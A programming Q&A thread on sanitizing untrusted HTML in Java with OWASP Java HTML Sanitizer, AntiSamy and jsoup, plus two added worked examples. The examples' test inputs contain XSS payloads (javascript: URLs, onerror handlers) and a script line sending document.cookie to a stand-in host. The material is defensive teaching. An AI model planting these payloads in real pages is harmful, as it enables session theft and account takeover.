How to sanitize HTML code in Java to prevent XSS attacks?

Frontend · unresolved · 5 answers · 1227 views
asked by 傲寒, 2020-12-05 00:29

I'm looking for a class/util etc. to sanitize HTML code, i.e. remove dangerous tags, attributes and values to avoid XSS and similar attacks.

I get html code from rich

5 answers
  • 2020-12-05 00:53

    You can try OWASP Java HTML Sanitizer. It is very simple to use.

    import org.owasp.html.HtmlPolicyBuilder;
    import org.owasp.html.PolicyFactory;

    // Allow-list policy: only <a> elements with an https href survive; every
    // other element and attribute is dropped, and rel="nofollow" is forced on
    // each surviving link. The PolicyFactory is immutable and thread-safe,
    // so build it once and reuse it.
    PolicyFactory policy = new HtmlPolicyBuilder()
        .allowElements("a")
        .allowUrlProtocols("https")
        .allowAttributes("href").onElements("a")
        .requireRelNofollowOnLinks()
        .toFactory(); // build() needs an HtmlStreamEventReceiver; toFactory() returns the reusable PolicyFactory
    
    String safeHTML = policy.sanitize(untrustedHTML);
    
    0 · Discussion (0)
  • 2020-12-05 00:55

    You could use OWASP ESAPI for Java, which is a security library that is built to do such operations.

    Not only does it have encoders for HTML, it also has encoders to perform JavaScript, CSS and URL encoding. Sample uses of ESAPI can be found in the XSS prevention cheatsheet published by OWASP.

    You could use the OWASP AntiSamy project to define a site policy that states what is allowed in user-submitted content. The site policy can be later used to obtain "clean" HTML that is displayed back. You can find a sample TinyMCE policy file on the AntiSamy downloads page.

    0 · Discussion (0)
  • 2020-12-05 01:00

    HTML escaping inputs works very well. But in some cases business rules might require you NOT to escape the HTML. Using regex is not a fit for the task, and it is too hard to come up with a good solution using it.

    The best solution I found was to use: http://jsoup.org/cookbook/cleaning-html/whitelist-sanitizer

    It builds a DOM tree with the provided input and filters any element not previously allowed by a Whitelist. The API also has other functions for cleaning up HTML.

    And it can also be used with javax.validation @SafeHtml(whitelistType=, additionalTags=).

    0 · Discussion (0)
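Worked example of the jsoup approach from the answer above. This is added here; it is neither the answerer's code nor taken from the jsoup cookbook. It shows the allow-list in two modes, reject (validate and refuse) and repair (clean), and the base-URI caveat the cookbook page glosses over: a relative link cannot be protocol-checked without a base URI, so it is silently stripped. The class name `JsoupSanitizer`, `BASE_URI` and the sample input are assumptions; the allow-list class is called `Whitelist` before jsoup 1.14.1 and `Safelist` from then on.

```java
import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;
import org.jsoup.safety.Cleaner;
import org.jsoup.safety.Safelist; // org.jsoup.safety.Whitelist in jsoup < 1.14.1

public final class JsoupSanitizer {

    // Hypothetical base URI of the site the content is displayed on; relative
    // links in the input are resolved and protocol-checked against it.
    private static final String BASE_URI = "https://example.com/";

    // Build the allow-list from nothing rather than trimming Safelist.basic(),
    // so every permitted tag, attribute and URL scheme is visible in one place.
    static final Safelist SAFELIST = Safelist.none()
            .addTags("p", "br", "b", "i", "strong", "em", "ul", "ol", "li", "blockquote", "a", "img")
            .addAttributes("a", "href")
            .addProtocols("a", "href", "https", "mailto")   // javascript:, data:, http: are all rejected
            .addEnforcedAttribute("a", "rel", "nofollow")   // added to every surviving link
            .addAttributes("img", "src", "alt")
            .addProtocols("img", "src", "https")
            .preserveRelativeLinks(true);                   // keep href="/docs" as written

    /** Reject mode: true only if nothing would have to be removed. Cleaner is
     *  used directly because Jsoup.isValid(String, Safelist) takes no base URI,
     *  so a harmless relative link would make the whole input "invalid". */
    public static boolean isClean(String untrustedHtml) {
        Document fragment = Jsoup.parseBodyFragment(untrustedHtml, BASE_URI);
        return new Cleaner(SAFELIST).isValid(fragment);
    }

    /** Repair mode: parse into a DOM, drop every node and attribute the
     *  safelist does not cover, and serialise the body fragment that is left. */
    public static String clean(String untrustedHtml) {
        return Jsoup.clean(untrustedHtml, BASE_URI, SAFELIST);
    }

    public static void main(String[] args) {
        // Constructed input: legitimate formatting and a relative link, mixed
        // with the usual injection attempts a rich-text editor does not stop.
        String untrusted = "<p>See <a href=\"/docs\">the docs</a> or "
                + "<a href=\"javascript:alert(1)\">this</a>.</p>"
                + "<img src=\"https://example.com/a.png\" onerror=\"alert(1)\" alt=\"a\">"
                + "<iframe src=\"https://evil.example/\"></iframe>"
                + "<p><b>bold</b><script>alert(document.cookie)</script></p>";

        System.out.println("accept as submitted? " + isClean(untrusted));
        System.out.println(clean(untrusted));

        // Same input cleaned without a base URI: the relative href cannot be
        // protocol-checked, so it is stripped even though it was legitimate.
        System.out.println(Jsoup.clean(untrusted, SAFELIST));
    }
}
```

Use `isClean` where the business rule is "only clean markup is accepted" (an API that should answer 400 on tampering rather than quietly fix it) and `clean` where the content must be stored and displayed regardless. In the repair path the `<script>` body, the `<iframe>`, the `onerror` handler and the `javascript:` href are removed because none of them appears in the safelist; nothing in the code names them, which is the point of an allow-list.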
  • 2020-12-05 01:09

    Regarding Antisamy, you may want to check this regarding the dependencies:

    http://code.google.com/p/owaspantisamy/issues/detail?id=95&can=1&q=redyetidave

    0 · Discussion (0)
  • 2020-12-05 01:12

    Thanks to @Saljack's answer. Just to elaborate more on OWASP Java HTML Sanitizer. It worked out really well (quick) for me. I just added the following to the pom.xml in my Maven project:

        <dependency>
            <groupId>com.googlecode.owasp-java-html-sanitizer</groupId>
            <artifactId>owasp-java-html-sanitizer</artifactId>
            <version>20150501.1</version>
        </dependency>
    

    Check here for latest release.

    Then I added this function for sanitization:

        import org.owasp.html.HtmlPolicyBuilder;
        import org.owasp.html.PolicyFactory;

        // Keeps only <a href> and <img src>. allowStandardUrlProtocols() admits
        // http, https and mailto, so javascript: and data: URLs are dropped.
        // The PolicyFactory is immutable and thread-safe; in production build it
        // once (e.g. a static final field) instead of on every call.
        private String sanitizeHTML(String untrustedHTML){
            PolicyFactory policy = new HtmlPolicyBuilder()
                .allowAttributes("src").onElements("img")
                .allowAttributes("href").onElements("a")
                .allowStandardUrlProtocols()
                .allowElements("a", "img")
                .toFactory();
    
            return policy.sanitize(untrustedHTML); 
        }
    

    More tags can be added by extending the comma-delimited parameter in the allowElements method.

    Just add this line prior to passing the bean off to save the data:

        bean.setHtml(sanitizeHTML(bean.getHtml()));
    

    That's it!

    For more complex logic, this library is very flexible and it can handle more sophisticated sanitizing implementations.

    0 · Discussion (0)
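Worked example for the OWASP Java HTML Sanitizer, serving both the first answer and the one just above. It is added here and is not code from either answerer or from the OWASP project. It extends their policies in the two directions the thread mentions but does not show: an attribute whose value is constrained by a pattern, and composition of a hand-built policy with the library's prebuilt `Sanitizers`, plus the library's `HtmlChangeListener` hook, which reports every discarded tag and attribute so the caller can log it. The class name `RichTextSanitizer`, the `SAFE_CLASS` pattern, the `Result` holder and the sample input are assumptions; the library calls themselves (`HtmlPolicyBuilder`, `PolicyFactory.and`, `sanitize(html, listener, context)`) are the library's own.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Pattern;

import org.owasp.html.HtmlChangeListener;
import org.owasp.html.HtmlPolicyBuilder;
import org.owasp.html.PolicyFactory;
import org.owasp.html.Sanitizers;

public final class RichTextSanitizer {

    // Hypothetical allow-list for class values: the editor's own styling hooks
    // are plain tokens, so quotes, braces and url(...) never match.
    private static final Pattern SAFE_CLASS = Pattern.compile("[A-Za-z0-9_ -]+");

    // Allow-list policy: links only over https or mailto with rel="nofollow"
    // forced on, images only over https, and a class attribute whose value must
    // match SAFE_CLASS. script, style, iframe, on* handlers and javascript:/data:
    // URLs are never mentioned and therefore never pass. PolicyFactory is
    // immutable and thread-safe: build it once, reuse it everywhere.
    static final PolicyFactory POLICY = new HtmlPolicyBuilder()
            .allowElements("a", "img")
            .allowAttributes("href").onElements("a")
            .allowAttributes("src", "alt").onElements("img")
            .allowUrlProtocols("https", "mailto")
            .requireRelNofollowOnLinks()
            .allowAttributes("class").matching(SAFE_CLASS).globally()
            .toFactory()
            // Policies compose: the prebuilt formatting (b, i, strong, ...) and
            // block (p, ul, ol, li, blockquote, ...) policies cover the rest.
            .and(Sanitizers.FORMATTING)
            .and(Sanitizers.BLOCKS);

    /** Clean markup plus a record of what had to be removed. */
    public static final class Result {
        public final String html;
        public final List<String> removed;
        Result(String html, List<String> removed) { this.html = html; this.removed = removed; }
    }

    // The library reports each discarded tag and attribute through this hook.
    // Logging it turns the sanitizer into a sensor: a user whose submissions
    // keep losing <script> tags deserves an alert, not just a clean-up.
    private static final HtmlChangeListener<List<String>> AUDIT =
            new HtmlChangeListener<List<String>>() {
        @Override public void discardedTag(List<String> log, String elementName) {
            log.add("tag <" + elementName + ">");
        }
        @Override public void discardedAttributes(List<String> log, String tagName,
                                                  String... attributeNames) {
            log.add("attributes " + String.join(",", attributeNames) + " on <" + tagName + ">");
        }
    };

    public static Result sanitize(String untrustedHtml) {
        List<String> removed = new ArrayList<>();
        String clean = POLICY.sanitize(untrustedHtml, AUDIT, removed);
        return new Result(clean, removed);
    }

    public static void main(String[] args) {
        // Constructed input: what a rich-text editor might submit after the
        // request body has been tampered with.
        String untrusted = String.join("\n",
                "<p class=\"intro\">Hello <b>world</b></p>",
                "<script>new Image().src='https://evil.example/?c='+document.cookie</script>",
                "<a href=\"javascript:alert(1)\">click me</a>",                        // scheme not allowed
                "<a href=\"https://example.com/\" onclick=\"alert(1)\">ok link</a>",   // handler not allowed
                "<img src=\"https://example.com/a.png\" onerror=\"alert(1)\" alt=\"a\">",
                "<img src=\"data:text/html;base64,PHNjcmlwdD4=\">",                    // scheme not allowed
                "<p class=\"x\" style=\"background:url(javascript:alert(1))\">styled</p>", // no allowStyling()
                "<p class=\"x&quot; onmouseover=&quot;alert(1)\">odd class</p>");      // fails SAFE_CLASS

        Result r = sanitize(untrusted);
        System.out.println(r.html);
        for (String item : r.removed) {
            System.out.println("removed " + item);
        }
    }
}
```

The `javascript:` and `data:` URLs fail the protocol allow-list and the attribute is dropped; because `<a>` and `<img>` are among the elements the library discards when they end up with no attributes, those two elements disappear and only the link text survives. The `<script>` element is removed together with its body, and the `style` attribute is removed because the policy never calls `allowStyling()`. Feed `r.removed` into the application log rather than discarding it: the policy makes the output safe, the listener tells you who is trying.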